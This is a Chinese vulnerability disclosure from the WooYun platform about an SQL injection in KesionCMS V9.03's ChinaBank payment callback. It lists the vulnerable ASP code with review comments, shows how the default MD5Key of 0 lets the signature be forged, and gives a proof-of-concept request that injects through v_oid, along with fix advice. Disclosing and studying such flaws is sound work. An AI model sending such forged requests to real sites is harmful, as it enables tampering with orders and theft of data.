
漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019057

漏洞标题:KesionCMS V9.03 Final SQL注射漏洞

相关厂商:KesionCMS

漏洞作者: My5t3ry

提交时间:2013-02-22 17:31

修复时间:2013-04-08 17:32

公开时间:2013-04-08 17:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]



漏洞详情

披露状态:

2013-02-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-04-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

昨天提交科讯getshell的洞,通知官方后,说是V9移除wap模块.....
然后就没下文了,好吧,那就来个V9的

详细说明:

漏洞存在于User/ChinaBankAutoReceive.asp

<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<%option explicit%>
<!--#include file="../Conn.asp"-->
<!--#include file="../Plus/md5.asp"-->
<!--#include file="../KS_Cls/Kesion.MemberCls.asp"-->
<!--#include file="payfunction.asp"-->
<%
'****************************************************
' Software name:Kesion CMS 9.0
' Email: [email protected] . QQ:111394,9537636
' Web: http://www.kesion.com http://www.kesion.cn
' Copyright (C) Kesion Network All Rights Reserved.
'****************************************************
' Page prologue for the ChinaBank payment callback: load the gateway settings
' (account id, MD5 key, rates) for payment platform 1, then hand over to ChinaBank().
' Buffer output and ask caches not to keep this callback response.
Response.Buffer = true
Response.Expires = 1
Response.CacheControl = "no-cache"
Dim KSUser:Set KSUser=New UserCls
Dim KS:Set KS=New PublicCls
' The platform id is a hard-coded constant, so the concatenated query below
' carries no request data.
Dim PaymentPlat:PaymentPlat=1
Dim RSP:Set RSP=Server.CreateObject("ADODB.RECORDSET")
RSP.Open "Select top 1 * From KS_PaymentPlat where id=" & PaymentPlat,conn,1,1
' No configuration row for this platform: stop with a generic error.
If RSP.Eof Then
RSP.Close:Set RSP=Nothing
Response.Write "Error!"
Response.End()
End If
Dim AccountID:AccountID=RSP("AccountID")
' MD5Key is the only secret behind the v_md5str check in ChinaBank().
' NOTE(review): the accompanying write-up reports the stored value as 0; with a
' guessable key the signature check authenticates nothing. Confirm that installs
' are required to set a random key.
Dim MD5Key:MD5Key=RSP("MD5Key")
' KS.ChkClng is defined outside this listing; presumably coerces to a Long - confirm.
Dim PayOnlineRate:PayOnlineRate=KS.ChkClng(RSP("Rate"))
Dim RateByUser:RateByUser=KS.ChkClng(RSP("RateByUser"))
RSP.Close:Set RSP=Nothing
Call ChinaBank()
' ChinaBank (网银在线) payment-result callback.
' Reads the callback fields from the request, recomputes the MD5 check string with
' the stored MD5Key, and on a match with status 20 calls UpdateOrder and tags the
' KS_LogMoney row with PaymentID=1.
' Security notes (review):
'   - Every field is read with request("name") and no collection, so it can be
'     supplied in the URL or form body; none is validated in this Sub.
'   - The MD5 comparison is the only gate before v_oid reaches SQL text. It proves
'     nothing about the sender unless MD5Key is secret and unguessable.
'   - v_oid is concatenated into the UPDATE below and, per the UpdateOrder listing
'     on this page, into further queries there. Validate the order-number format
'     and use a parameterized ADODB.Command instead of string concatenation.
Sub ChinaBank()
Dim v_oid,v_pmode,v_pstatus,v_pstring,v_string,v_amount,v_moneytype,remark2,v_md5str,text,md5text,zhuangtai
' Read the returned parameter values
v_oid=request("v_oid") ' order number (v_oid) sent by the merchant
v_pmode=request("v_pmode") ' payment method (string)
v_pstatus=request("v_pstatus") ' payment status: 20 (payment succeeded); 30 (payment failed)
v_pstring=request("v_pstring") ' payment result message: "payment complete" when v_pstatus=20; failure reason when v_pstatus=30
v_amount=request("v_amount") ' amount actually paid for the order
v_moneytype=request("v_moneytype") ' currency actually paid for the order
remark2=request("remark2") ' remark field 2
v_md5str=request("v_md5str") ' MD5 check string assembled by ChinaBank
' Reject callbacks that carry no check string at all.
if request("v_md5str")="" then
response.Write("v_md5str:空值")
response.end
end if
text = v_oid&v_pstatus&v_amount&v_moneytype&MD5Key ' input to the MD5 check
md5text = Ucase(trim(md5(text,32))) ' MD5 check string computed on the merchant side
if md5text<>v_md5str then ' compare the ChinaBank-supplied MD5 string with the locally computed one
response.write("error") ' tell the gateway that verification failed and ask it to resend
response.end ' stop processing
else
' NOTE(review): "ok" is written before the status test, so the failure branch
' below appends "error" to it and the response body becomes "okerror".
response.write("ok")
if v_pstatus=20 then ' payment succeeded
Call UpdateOrder(v_amount,remark2,v_oid,v_pmode)
' Injection sink: v_oid is placed between quotes in the statement text unescaped.
Conn.Execute("Update KS_LogMoney Set PaymentID=1 Where OrderID='" & v_oid & "'")
else
response.write("error") ' tell the gateway that verification failed and ask it to resend
response.end ' stop processing
end if
end if
end Sub
%>


上面代码中的v_oid=request("v_oid")没有过滤,然后就调用了

' v_oid reaches this call exactly as read from request("v_oid"); nothing in ChinaBank() validates or escapes it.
Call UpdateOrder(v_amount,remark2,v_oid,v_pmode)


我们接着看UpdateOrder

' Applies a confirmed payment to the site's records.
' Parameters: v_amount (amount paid), remark2 (remark text), v_oid (order number),
' v_pmode (payment method). In the ChinaBank callback shown on this page all four
' come straight from the request.
' Flow: if no KS_LogMoney row exists yet for v_oid, then for Action="shop" mark the
' KS_Order row as paid, log the money movement and deduct stock; otherwise credit
' the member account (or apply a top-up card).
' Security notes (review):
'   - v_oid is concatenated unescaped into the KS_LogMoney and KS_Order SELECTs.
'     These should be parameterized (ADODB.Command with parameters), with the
'     order-number format validated first.
'   - UserName is concatenated into the KS_User SELECT; whether KS.S() escapes
'     quotes is not visible in this listing - confirm.
'   - rs("orderid") is read back from the database and concatenated into the stock
'     queries; parameterize those too rather than trusting stored values.
Sub UpdateOrder(v_amount,remark2,v_oid,v_pmode)
Dim KSUser:Set KSUser=New UserCls
Dim UserName,MoneyType,Money,Remark,sqlUser,rsUser,orderid,mobile,Action
orderid=v_oid
' Use the logged-in user's name when there is a session, else take it from KS.S("UserName").
IF Cbool(KSUser.UserLoginChecked) Then UserName=KSUser.UserName Else UserName=KS.S("UserName")

'======================= If the data cannot be obtained from the request, take the values again =================
' SUserName, sUserCardID and Saction are not defined in this listing; presumably
' set by the including page or payfunction.asp - confirm.
If UserName="" Then UserName=SUserName
Dim UserCardID
UserCardID=KS.ChkClng(KS.S("UserCardID"))
iF UserCardID=0 Then UserCardID=sUserCardID
Action=KS.G("Action"): If Action="" Then Action=Saction
'==============================================================================

Mobile=KSUser.GetUserInfo("Mobile")
Money=v_amount
Remark=remark2
Dim RSLog,RS
Set RSLog=Server.CreateObject("ADODB.RECORDSET")
' Injection sink named in the write-up: v_oid goes between quotes in the query text unescaped.
RSLog.Open "Select top 1 * From KS_LogMoney where orderid='" & v_oid & "'",Conn,1,1
' Proceed only when this order has no money-log row yet.
if RSLog.Eof And RSLog.BoF Then
Select Case Action
case "shop" ' purchase in the shop centre
Set RS=Server.CreateObject("ADODB.RECORDSET")
' Second sink for v_oid; lock type 3 makes this recordset updatable (RS.Update below).
RS.Open "Select top 1 * From KS_Order Where OrderID='" & v_oid & "'",Conn,1,3
If RS.Eof Then
RS.Close:Set RS=Nothing
KS.Die "<br><li>支付过程中遇到问题,请联系网站管理员!"
End If
If Mobile="" Then
Mobile=RS("Mobile")
End If
' The recorded receipt is the request-supplied amount. It is covered only by the
' MD5 check in the caller and is not cross-checked against the gateway here.
RS("MoneyReceipt")=Money
If Money>=RS("MoneyTotal") Then
RS("PayStatus")=1 ' paid in full
ElseIf Money<>0 Then
RS("PayStatus")=2 ' deposit received
Else
RS("PayStatus")=0 ' unpaid
End If
' Remember the previous status so stock is deducted only on the first transition to 1.
Dim OrderStatus:OrderStatus=rs("status")
RS("Status")=1
RS("PaymentPlatId")=KS.ChkClng(Request("PaymentPlat")) ' payment interface id
RS("PayTime")=now ' record the payment time
RS.Update
orderid=RS("OrderID")
Dim XID:XID=RS("ID")
Call KS.MoneyInOrOut(rs("UserName"),RS("Contactman"),Money,2,1,now,rs("orderid"),"System","为购买订单:" &v_oid & "使用" & v_pmode & "在线充值",0,0,0)
Call KS.MoneyInOrOut(rs("UserName"),RS("Contactman"),Money,4,2,now,rs("orderid"),"System",Remark,0,0,0)


'==================== Update stock quantities ========================
' The stored order id is concatenated into the query text again here and below.
Dim rsp:set rsp=conn.execute("select id,title from ks_product where id in(select proid from KS_OrderItem where orderid='" & rs("orderid") & "')")
do while not rsp.eof

dim rsi:set rsi=conn.execute("select amount,attrid from ks_orderitem where orderid='" & rs("orderid") & "' and proid=" & rsp(0))
if not rsi.eof then
if OrderStatus<>1 Then ' deduct stock
' A non-zero AttrID deducts from the per-specification stock row, otherwise from
' the product total. The "amount>=" / "totalnum>=" conditions keep stock from
' going negative.
If RSI("AttrID")<>0 Then
Conn.Execute("update KS_ShopSpecificationPrice set amount=amount-" & RSI(0) & " Where amount>=" & RSI(0) & " and ID=" & RSI(1))
Else
conn.execute("update ks_product set totalnum=totalnum-" & rsi(0) &" where totalnum>=" & rsi(0) &" and id=" & rsp(0))
End If
End If
end if
rsi.close
set rsi=nothing

' The next line is a commented-out score-award call, kept exactly as in the original.
'Call KS.ScoreInOrOut(UserName,1,KS.ChkClng(rsp(0))*amount,"系统","购买商品<font color=red>" & rsp("title") & "</font>赠送!",0,0)

rsp.movenext
loop
rsp.close
set rsp=nothing
'================================================================

RS.Close:Set RS=Nothing
IF KS.C("UserName")<>"" Then response.Redirect "User_Order.asp?Action=ShowOrder&ID=" & XID
Case else ' top-up in the member centre
Set rsUser=Server.CreateObject("Adodb.RecordSet")
' NOTE(review): UserName may come from KS.S("UserName") and is concatenated here.
sqlUser="select top 1 * from KS_User where UserName='" & UserName & "'"
rsUser.Open sqlUser,Conn,1,1
if rsUser.bof and rsUser.eof then
Response.Write "<br><li>充值过程中遇到问题,请联系网站管理员!"
rsUser.close:set rsUser=Nothing
exit sub
end if
Dim RealName:RealName=rsUser("RealName")
Dim Edays:Edays=rsUser("Edays")
Dim BeginDate:BeginDate=rsUser("BeginDate")
rsUser.Close : Set rsUser=Nothing
If UserCardID<>0 Then ' top-up card
Call UpdateByCard(0,UserCardID,UserName,RealName,Edays,BeginDate,v_oid,v_pmode)
Else
Call KS.MoneyInOrOut(UserName,RealName,Money,3,1,now,v_oid,"System",v_pmode & "在线充值,订单号为:" & v_oid,0,0,0)
End If

End Select

End If
RSLog.Close:Set RSLog=Nothing
End Sub


' The order number from the request is concatenated between the quotes of this query's text.
RSLog.Open "Select top 1 * From KS_LogMoney where orderid='" & v_oid & "'",Conn,1,1


这句把v_oid直接拼接进SQL语句了!那么怎样构造参数才能触发漏洞呢?
我们这样构造:
/User/ChinaBankAutoReceive.asp?v_oid=1%27&v_pstatus=20&v_amount=1&v_moneytype=1&v_md5str=9B5BF7166AFBB5E1602BBCC964459B9B
其中的v_oid带入我们的SQL注射语句...你懂的,后面的v_md5str是md5(v_oid&v_pstatus&v_amount&v_moneytype&MD5Key)得到的,MD5Key的值来自数据库(KS_PaymentPlat表的MD5Key字段),值为0。也就是说,这个MD5校验只有在MD5Key保密且不可猜测时才起作用;密钥为0时校验形同虚设。
简单地说,v_oid构造SQL后,md5(v_oid&v_pstatus&v_amount&v_moneytype&MD5Key)计算出v_md5str,然后提交就行了

漏洞证明:

/User/ChinaBankAutoReceive.asp?v_oid=1%27&v_pstatus=20&v_amount=1&v_moneytype=1&v_md5str=9B5BF7166AFBB5E1602BBCC964459B9B

ke.jpg

修复方案:

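过滤,你懂的。具体来说:v_oid等回调参数在进入SQL之前应先校验格式(只允许订单号实际使用的字符),并把拼接SQL改为参数化查询(ADODB.Command加参数);同时MD5Key不能保持为0这类可猜测的值,否则签名校验不起任何作用。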

版权声明:转载请注明来源 My5t3ry@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝